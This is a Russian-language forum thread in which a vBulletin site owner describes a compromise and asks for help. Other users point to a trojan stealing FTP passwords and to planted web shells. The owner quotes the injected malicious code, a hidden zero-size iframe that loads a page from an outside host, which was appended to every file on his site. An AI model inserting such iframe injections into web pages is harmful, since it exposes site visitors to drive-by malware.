У Вас в настройках PHP register_globals=ON? какеры идут к Вам!!!

Файловый Архив

  • Неограниченное количество категорий и суб-категорий
  • Настройки прав доступа по группам
  • Настройки прав доступа по каждой категории
  • Предпросмотр медиа файлов: FLV, IFLV, F4A, F4V, MP4, MP3, MOV и других...
  • Мультизагрузка файлов - SWFUploader
  • Добавление файлов с сервера
Подробности и история обновлений продукта в этой теме
Loading

Go Back   форум vBSupport.org > > > >
Register Изображения Меню vBsupport Files Manager Аллея Звёзд Реклама на форуме Search Today's Posts Mark Forums Read
  • Мемберка
  • Администраторам
  • Premoderation
  • For English speaking users
  • Изменения в правах
  • Каталог Фрилансеров
Пароли на скачивание файлов в Member Area меняются автоматически каждый день
Если вам нужно скачать какой то скрипт, за паролем ко мне в ЛС
привет какирам kerk
Ещё раз обращаем Ваше внимание: всё, что Вы скачиваете и устанавливаете на свой форум, Вы устанавливаете исключительно на свой страх и риск.
Сообщество vBSupport'а физически не в состоянии проверять все стили, хаки и нули, выкладываемые пользователями.
Помните: безопасность Вашего проекта - Ваша забота.
Убедительная просьба: при обнаружении уязвимостей или сомнительных кодов обязательно отписывайтесь в теме хака/стиля
Спасибо за понимание
На форуме введена премодерация ВСЕХ новых пользователей

Почта с временных сервисов, типа mailinator.com, gawab.com и/или прочих, которые предоставляют временный почтовый ящик без регистрации и/или почтовый ящик для рассылки спама, отслеживается и блокируется, а так же заносится в спам-блок форума, аккаунты удаляются
for English speaking users:
You may be surprised with restriction of access to the attachments of the forum. The reason is the recent change in vbsupport.org strategy:

- users with reputation < 10 belong to "simple_users" users' group
- if your reputation > 10 then administrator (kerk, Luvilla) can decide to move you into an "improved" group, but only manually

Main idea is to increase motivation of community members to share their ideas and willingness to support to each other. You may write an article for the subject where you are good enough, you may answer questions, you may share vbulletin.com/org content with vbsupport.org users, receiving "thanks" equal your reputation points. We should not only consume, we should produce something.

- you may:
* increase your reputation (doing something useful for another members of community) and being improved
* purchase temporary access to the improved category:
10 $ for 3 months. - this group can download attachments, reputation/posts do not matter.
20 $ for 3 months. - this group can download attachments, reputation/posts do not matter + adds eliminated + Inbox capacity increased + files manager increased permissions.

Please contact kerk or Luvilla regarding payments.

Important!:
- if your reputation will become less then 0, you will be moved into "simple_users" users' group automatically.*
*for temporary groups (pre-paid for 3 months) reputation/posts do not matter.
Не можете скачать вложение?
Изменения в правах групп пользователей
внимательно читаем эту и эту темы
Короткая версия - тут
Уважаемые пользователи!

На форуме открыт новый раздел "Каталог фрилансеров"

и отдельный раздел для платных заказов "Куплю/Закажу"

 
 
Old  
mikael
На доске почёта
 
banned nax
Default Взлом vBulletin 3.6.8 Patch Level 1 0

Всем привет.
Началось пару недель назад. У юзеров стали появляться ошибки с куками при работе форума. Оказалось, что в конец всех файлов был дописан код
Code:
<IFRAME src="http://gothamcomputers.com/dompu/cmd/henca.html" width="0" height="0" frameborder="0"></iframe>
<IFRAME src="http://gothamcomputers.com/dompu/cmd/henca.html" width="0" height="0" frameborder="0"></iframe>
Поборол восстановлением бэкапа. Это повторялось несколько раз. Сначала думал, что увели пароли фтп, но и после смены пароля это повторилось (пароль нигде не хранится). Комп на вирусы проверен. Посмотрев в логи фтп, никого кроме себя не обнаружил. Следов того, что меняли все файлы, нет.

Это еще полбеды. На днях начал тормозить форум, периодически он просто лежал. Обратился к хостеру за разъянениями. Оказалось, что мой аккаунт (по словам хостера) запускает ботов и вредоносное ПО Tembilahan-bot psyBNC 2.3.2. Это ПО обычно загружается через скрипты и дыры в них. ФТП для этого не используют, что и по логам видно. Хостер (http://www.eserver.ru) клянется и божится, что это дыры в моих скриптах, т.е. в вобле. На аккаунте есть еще два мелких сайта, но они на чистом html.

Отсюда вопрос: как это лечить и как этому противодействовать?

Установленные хаки:
  • ipInfo 1.0 (ipInfo is a replacement standard view users ip)
  • New posts and reputation comments 3.18 (Показывает количество новых сообщений с вашего последнего визита, и количество новых комментарий репутации если имеются. перевод kontra)
  • Автоматическая отправка личного сообщения при моде 3.6.2 (Автоматическая отправка личного сообщения пользователям, если их тема была отредактирована. Перевод и доработка - AnTekapb)
  • Отображение ботов 1.4 (Отображение поисковых ботов в списке пользователей онлайн. Перевод выполнил Ateist)
  • Система предупреждений 3.6.x 3.6.8 (Система предупреждений с расширенными возможностями. Автор — Damned Tiny)
  • Смайлы в форме быстрого ответа 1.0.0 (Добавляет выпадающее меню со смайлами в форму быстрого ответа)
  • Хак Благодарностей для 3.6.8 6.3 (Перевод осуществил "FintMax")
  • [NuHIT] - NuSEO.PHP 1.6 (NuHIT's NuSEO.PHP)

Добавлено через 7 минут
По ошибке запостил в раздел другой версии. Переместите плз.

Last edited by mikael : 01-14-2008 at 09:18 PM. Reason: Добавлено сообщение
 
Bot
Yandex Bot Yandex Bot is online now
 
Join Date: 05.05.2005
Реклама на форуме А что у нас тут интересного? =)
Old  
zCarot
zМарковь
Хочет третью строчку =)
 
zCarot's Avatar
Default 0

mikael, Это не связано с булкой. У кого-то, кто имеет доступ к ftp трояном увели пароль
 
Old  
AntiPiton
Эксперт
 
AntiPiton's Avatar
Default 0

mikael, посмотри свой фтп на наличие шеллов...
 
Old  
Мик
Эксперт
 
Мик's Avatar
Default 0

Quote:
Originally Posted by mikael View Post
http://www.eserver.ru
хостился у них полтора года
лентяи каких свет не видовал
одни отмазки, это не мы, это ваши баги и т.д.
 
Old  
mikael
На доске почёта
 
banned nax
Default 0

Quote:
Originally Posted by zCarot View Post
mikael, Это не связано с булкой. У кого-то, кто имеет доступ к ftp трояном увели пароль
Кроме меня, ни у кого доступа нет.

Добавлено через 57 секунд
Quote:
Originally Posted by AntiPiton View Post
mikael, посмотри свой фтп на наличие шеллов...
Рад бы, да не знаю как
К тому же это виртуальный хостинг, так что мои права там крайне ограничены. Сейчас переезжаю на VDS (ruweb.net). Вот и думаю, а не притащу ли я эту заразу туда.

Добавлено через 3 минуты
Quote:
Originally Posted by Мик View Post
хостился у них полтора года
лентяи каких свет не видовал
одни отмазки, это не мы, это ваши баги и т.д.
Согласен, лентяи еще те. Это не считая других геморов.

Last edited by mikael : 01-14-2008 at 11:31 PM. Reason: Добавлено сообщение
 
Old  
Sellrion
В Черном-причерном списке
 
Sellrion's Avatar
Default 1

mikael, ну давайте вместе попробуем пошевелить мозгом. Я думаю Вы согласны с тем, что ничего просто так не бывает, как и чудес тоже не может быть (ну, по крайней мере, на сервере). Вы говорите, что только у Вас есть доступ к ftp. Тогда есть три варианта:

1. Вирус на сервере.
2. Кто-то воспользовался вашим ftp-доступом.
3. Вы залили на сервер изначально криптованный дистрибутив воблы.

Все! В Вашей ситуации других разумных причин не придумать. Исходя из этого имеем по пунктам:

1. Маловероятно, но все же возможно. Стучите к хостеру.
2. Надо знать что такое ftp-защита и пользоваться ей. Так же, не сохранять пароли в формах браузера и переодически их менять. Ну и конечно не юзать простые пароли.
3. Надо думать откуда качаете дистрибутив Воблы.

Как видите, почти во всех случаях виноваты Вы и только Вы. И как теперь избавляться от этого решать только Вам, исходя из ситуации...
 
Old  
mikael
На доске почёта
 
banned nax
Default 0

Quote:
Originally Posted by Sellrion View Post
1. Вирус на сервере.
2. Кто-то воспользовался вашим ftp-доступом.
3. Вы залили на сервер изначально криптованный дистрибутив воблы.

Все! В Вашей ситуации других разумных причин не придумать. Исходя из этого имеем по пунктам:

1. Маловероятно, но все же возможно. Стучите к хостеру.
2. Надо знать что такое ftp-защита и пользоваться ей. Так же, не сохранять пароли в формах браузера и переодически их менять. Ну и конечно не юзать простые пароли.
3. Надо думать откуда качаете дистрибутив Воблы.
1. Стучал. Хостер в грудь бьется, что это дырявые скрипты. Скриптов, кроме воблы на аккаунте нет.
2. Пароли и так длиннее некуда. В формах сохранял раньше, но потом передумал
3. Все дистрибутивы отсюда.
 
Old  
Sellrion
В Черном-причерном списке
 
Sellrion's Avatar
Default 0

mikael, шевелите же мозгом! Вот это:
Quote:
Originally Posted by Sellrion View Post
Я думаю Вы согласны с тем, что ничего просто так не бывает, как и чудес тоже не может быть (ну, по крайней мере, на сервере). Вы говорите, что только у Вас есть доступ к ftp.
говорит о том что одно из этих утвержений:
Quote:
Originally Posted by mikael View Post
1. Стучал. Хостер в грудь бьется, что это дырявые скрипты. Скриптов, кроме воблы на аккаунте нет.
2. Пароли и так длиннее некуда. В формах сохранял раньше, но потом передумал
3. Все дистрибутивы отсюда.
не соответсвует действительности вопреки Вашим убеждениям. Хотите Вы того или нет. К сожалению мы не можем Вам помочь, ибо экстрасенсов тут нет...
 
Old  
КотЪ
Администратор
Неадекватный
 
КотЪ's Avatar
Default 0

Quote:
Кроме меня, ни у кого доступа нет.
Троян. Троян на компе. Который исправно передает кому надо все ваши изменения пароля к фтп.

Спорим, пароль сохранен в тотал коммандере? Или чем вы там пользуетесь )

+ к этому - ищем шелл.
Умный "хакер" в первую очередь, заливает шелл в укромное местечко.
И только потом вешает ифрейм.
 
Old  
mikael
На доске почёта
 
banned nax
Default 0

Ясно. Всем спасибо.
 
 

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off




All times are GMT +4. The time now is 07:08 AM.


Powered by vBulletin® Version 3.0.0
Copyright ©2000 - 2016, Jelsoft Enterprises Ltd.